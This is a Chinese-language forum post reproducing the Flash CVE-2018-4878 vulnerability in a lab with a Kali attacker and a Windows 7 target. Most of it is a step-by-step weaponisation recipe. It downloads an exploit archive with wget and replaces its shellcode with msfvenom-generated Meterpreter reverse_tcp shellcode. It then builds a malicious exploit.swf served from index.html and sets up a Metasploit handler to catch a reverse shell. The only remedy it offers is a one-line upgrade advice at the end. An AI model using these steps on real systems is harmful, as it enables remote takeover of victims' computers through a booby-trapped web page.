標題:Flash 0day CVE-2018-4878 漏洞復現

taibeihacker

Moderator

0x01 前言​

Adobe公司在當地時間2018年2月1日發布了一條安全公告:
公告稱一個新的Flash 0Day漏洞(CVE-2018-4878)已經存在野外利用,可針對Windows用戶發起定向攻擊。攻擊者可以誘導用戶打開包含惡意Flash 代碼文件的Microsoft Office 文檔、網頁、垃圾電子郵件等。

0x02 漏洞影响​

Flash Player當前最新版本28.0.0.137以及之前的所有版本

0x03 漏洞复现​

环境测试:攻击机:kali 目标靶机:win7x64 +IE8.0+FLASH player28.0.0.1371.下載cve-2018-4878的腳步利用
wget https://raw.githubusercontent.com/backlion/demo/master/CVE-2018-4878.rar
2.解壓壓縮文件後,可看到cve-2018-4878.py和exploit.swf
1cpzxz2kydo24003.jpg

3.我們需要對cve-2018-4878.py進行修改,原作者將代碼中的stageless變量改成了true,正確的應該改成:stageless=False。附上原作者的exp地址:https://github.com/anbai-inc/CVE-2018-4878.git
ukhq2ons1v424004.png

4.其次需要修改替換原來彈計算器的shellcode
dlkgz05sroo24005.jpg

5.在kali下生成msf的shellcode:
msfvenom -pwindows/meterpreter/reverse_tcplhost=your host lport=your port -fpythonshellcode.txt
w423f3j5nuz24006.jpg

6.將生成的shellcode替換掉原有cve-2018-4878.py中的shelldoce即可
x1qbx0ynp2524007.jpg

7.在kal下執行cve-2018-4878.py,這裡需要和index.html在一個目錄下,即可生成惡意的exploit.swf
blxdjtiff2w24008.jpg

8.這里為了演示我將index.html和exploit.swf一同拷貝到目標靶機win7x64上,在ie瀏覽器下打開(也可以通過搭建web服務器的形式將index.html和exploit.swf放在web目錄下,訪問地址來打開)。
dqzb4svyape24009.jpg

9.在msf 下進行監聽設置
msf use
exploit/multi/handler
msf exploit(handler)
set payloadwindows/meterpreter/reverse_tcp
msf exploit(handler)
set lhost 10.0.0.217
msf exploit(handler)
set lport 443
msf exploit(handler)
exploit
fjfbxgf2el124010.jpg

10.當打開目標惡意的index.html頁面時,即可觸發反彈shell
fgm3smlbrur24011.jpg

0x04
漏洞修復建設通過官方網站升級到最新版本
 
返回
上方